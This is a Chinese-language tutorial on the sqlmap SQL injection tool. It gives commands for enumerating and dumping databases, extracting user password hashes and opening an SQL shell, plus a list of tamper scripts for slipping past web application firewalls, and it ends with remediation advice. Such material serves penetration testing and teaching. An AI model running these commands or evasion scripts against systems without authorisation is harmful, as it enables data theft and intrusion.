SQLMAP简介及使用方式

一、SQLMAP简介

SQLMAP是一款由Python开发的自动化SQL注入工具，其主要功能是扫描、发现并利用SQL注入漏洞，它内置了很多绕过插件，并且支持多种数据库，如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库；

SQLMAP的强大之处在于对数据库指纹的识别、数据库枚举、数据提取、访问目标文件系统、并在获取完全的操作权限时执行任意命令，它支持以下几种独特的注入：

• 基于布尔类型的注入，即可根据返回页面判断条件真假的注入；

• 基于时间的盲注，即不能根据页面返回判断的时候，利用时间线是否延时来判断条件的真假；

• 基于报错的注入，即页面会返回错误信息，或者把注入的语句的结果直接返回到页面中，比如数据库报错的信息等；

• 联合查询注入，即可以使用Union的情况下注入；

• 堆叠查询注入，即可以同时执行多条语句时的注入；

二、SQLMAP安装

前面我们提到了SQLMAP是由Python编写，因此我们需要安装配置Python环境，安装完成后，将Python目录加入环境变量，然后将下载好的SQLMAP目录放到Python目录下，然后配置好环境变量，然后即可在CMD环境下启动SQLMAP

三、SQLMAP的使用

• 注入判断

• • sqlmap.py -u url

• 查询当前站点使用的数据库

• • sqlmap.py -u url --current-db

• 查询当前用户下所有数据库

• • sqlmap.py -u url --dbs

• 查询表名

• • sqlmap.py -u url -D dbname --tables

• 查询字段名

• • sqlmap.py -u url -D dbname -T tablename --columns

• 查询字段内容

• • sqlmap.py -u url -D dbname -T tabalename -C olumnname --dump

• 查询数据库的所有用户（当前用户有读写权限）

• • sqlmap.py -u url --users

• 查询数据库用户的密码（当前用户有读取权限）

• • sqlmap.py -u url --password

• 查询当前数据库用户名称

• • sqlmap.py -u url --current-user

• 指定数据库类型

• • sqlmap.py -u url -dbms=mysql/oracle/mssql

• 判断用户是否为管理员

• • sqlmap.py -u url --is-dba

• • 返回为结果为true时，当前数据库用户为root，返回结果为false则相反

• --level 5 探测等级

• • --level 1 默认的等级，会进行基本的测试，包括GET和POST方式

• • --level 2 在原有的基础上增加对cookie的检测

• • --level 3 增加对USER AGENT/REFERER的检测

• • --level 4 更多的payload

• • --level 5 最高等级，包含所有的payload,会尝试自动破解出cookie、xff等头部注入（速度最慢）

• -v 显示调用信息的7个级别

• • 0 只显示python错误以及严重的信息

• • 1 同时显示基本信息和警告信息

• • 2 同时显示debug信息

• • 3 同时显示注入的payload

• • 4 同时显示http请求

• • 5 同时显示http响应头

• • 6 同时显示http响应页面

• 伪造Referer头

• • --referer：当前等级为3或3以上时，会尝试对referer注入，可以使用referer来伪造referer来源

• • 

• • 执行自定的SQL语句

• • --sql-shell

四、SQL注入的修复与绕过

• 目前为止我们已经学习了手工注入和SQLMap工具的注入方法。 但是，如果目标安装了一些防护软件怎么办呢？

• 常用绕过思路：

• • 大小写绕过

• • 双写绕过

• • 编码绕过

• • 内联注释绕过

• • 其他数据库特征

• SQLMAP使用脚本绕过

• • sqlmap.py -u- url --tamper “脚本名称.py”

• SQLMAP常见绕过脚本（部分）

• • apostrophemask.py  将引号替换为UTF-8，用于过滤单引号

• • base64encode.py   替换为base64编码

• • multiplespaces.py   围绕着SQL关键字添加多个空格

• • nonrecursivereplacement.py 双写语句替换预定义的payload

• • space2randomblank.py  将空格替换为其他的有效字符

• • unionalltounion.py   union all select替换为union select

• • securesphere.py   追加一些其他特殊字符串

• • space2hash.py  将空格替换为#号，并添加一个随机字符串和换行符

• • space2mssqlblank.py 空格替换为其他空符号

• • space2mssqlhash.py 空格替换为#号，并添加一个换行符

• • between.py   用NOT BETWEEN 0 AND 替换大于号，用 BETWEEN  AND替换等号

• • percentage.py   ASP每个字符前添加%,如%s%e%l%e%c%t%...

• • charencode.py  对未url编码处理的Payload字符串进行url编码

• • charunicodeencode.py 使用unicode编码

• • space2comment.py  空格替换为/**/

• • equaltolike.py    等号替换为like

• • greatest.py   用GREATEST替换大于号

• • modsecurityversioned.py  空格替换为MySQL内联注释

• • modsecurityzeroversioned.py 使用MySQL内联注释（/!00000/）注入

• • space2mysqldash.py  空格替换为--和一个换行符

• • chardoubleencode.py  对Payload进行两次URL编码（不处理已经编码的字符）

• 修复建议

• • 在服务器端要对所有的输入数据验证有效性。

• • 在处理输入之前，验证所有客户端提供的数据，包括所有的参数、URL和HTTP头的内容。

• • 验证输入数据的类型、长度和合法的取值范围。

• • 使用白名单验证允许的输入字符而不是黑名单。

• • 在危险字符输入后进行转义或编码。

• • 明确所有输入正确的字符集。

• • 不使用动态拼接的SQL语句，如果使用对特殊字符进行转义。

• • 设置最小权限运行程序，如apache权限运行